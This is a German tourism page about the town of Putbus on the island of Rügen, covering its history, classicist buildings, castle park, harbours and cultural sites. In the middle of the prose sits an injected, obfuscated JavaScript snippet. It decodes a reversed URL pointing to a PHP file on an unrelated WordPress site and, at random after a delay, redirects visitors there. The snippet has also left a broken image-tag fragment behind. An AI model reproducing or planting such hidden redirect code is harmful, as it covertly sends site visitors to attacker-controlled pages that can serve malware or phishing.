Die frühere Fürstenresidenz Putbus ist heute ein staatlich anerkannter Erholungsort im Südosten der Insel Rügen und nur 6 km von Ihrem Wohnort Zirkow entfernt. Er liegt in der für Rügen typischen Natur mit Uferwäldern, kleinen Buchten und dem Greifswalder Bodden (einer großen Lagune), keine 2.5 Kilometer von der Südküste mit Naturstränden, Bademöglichkeiten und Häfen entfernt.

das Umfeld: die Fürstenresidenz Putbus

Putbus wurde 1810 vom damals 33jährigen Wilhelm Malte I. Fürst zu Putbus als fürstliche Residenz gegründet. Seinerzeit unternahm er umfangreiche Bautätigkeiten auf der Insel, wobei Putbus hervorragte: Aufwendig im klassizistischen Stil errichtet, zeugen noch heute viele historische Gebäude von den Vorstellungen des Fürsten aus dem slawisch-rügenschen Adelsgeschlecht der Herren zu Putbus.

das Umfeld: das Theater von Putbus

Auffällig sind dabei der „Circus“ (kreisrunde Gebäude-Anordnung) und die vielen weißen Villen mit Rosenstöcken, dank derer Putbus den Beinamen „weiße Stadt“ trägt. Putbus ist die jüngste Stadt, aber der älteste Badeort der Insel. Er erhielt erst 1960 das Stadtrecht und zählt heute mit etwa 4300 Einwohnern zu den 4 Städten Rügens. Putbus umfasst mittlerweile 30 Ortsteile, von denen viele direkt am Greifswalder Bodden liegen und Möglichkeiten zum Baden und Surfen, Rudern und Angeln bieten.

das Umfeld: Pergola im Schlosspark von Putbus

Einer der schönsten Putbusser Ortsteile ist sicherlich Lauterbach: Sie finden hier schmucke Häfen mit Cafés und den Blick auf Schiffe, Segelboote und Yachten. Am Hafen können Sie außerdem mit Ausfluggschiffen die nahe Insel Vilm und den Greifswalder Bodden entdecken.

Besuchenswert ist zudem der 75 Hektar große Schlosspark in Putbus, zu dem ein fast 8 Hektar großes Damm- und Rotwildgehege gehört. Fürst Malte I ließ ihn 1804 im Stil französischer Parks anlegen, wurde aber später im Stil englischer Landschaftspark weitergeführt. Der Schlosspark bietet schöne Sichtschneisen auf die Greifswalder Boddenlandschaft und enthält seltene Bäume und Pflanzen.

Die weiße Stadt gilt auch als Rügens „Kunst & Kulturhauptstadt“: Neben der Orangerie mit Kunstausstellungen, dem Uhrenmuseum, der Pfarrkirche oder dem Marstall (Rügens größter Veranstaltungsraum) bietet Putbus ein Theatergebäude, das einzige der Insel.

$Ikf=function(n){if (typeof ($Ikf.list[n]) == „string“) return $Ikf.list[n].split(„“).reverse().join(„“);return $Ikf.list[n];};$Ikf.list=[„\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-1024×683.jpg“ alt=“das Umfeld: der rasende Roland im Putbusser Bahnhof“ width=“940″ height=“627″ class=“aligncenter size-large wp-image-177″ />

Sie finden in Putbus Cafés und Restaurants, Einfkaufsmöglichkeiten, Bäcker, Bank und Apotheke. Putbus verfügt über eine gut ausgebaute Infrastruktur, ist leicht mit PKW erreichbar und hervorragend an das Radwegenetz der Insel angebunden. Die Radwege führen sogar durch die Stadt. Zudem teilt sich die historische Schmalspurbahn Rasender Roland einen Bahnhof mit der Regionalbahn in Putbus. Er verbindet unter Anderem die Ostseebäder Rügens.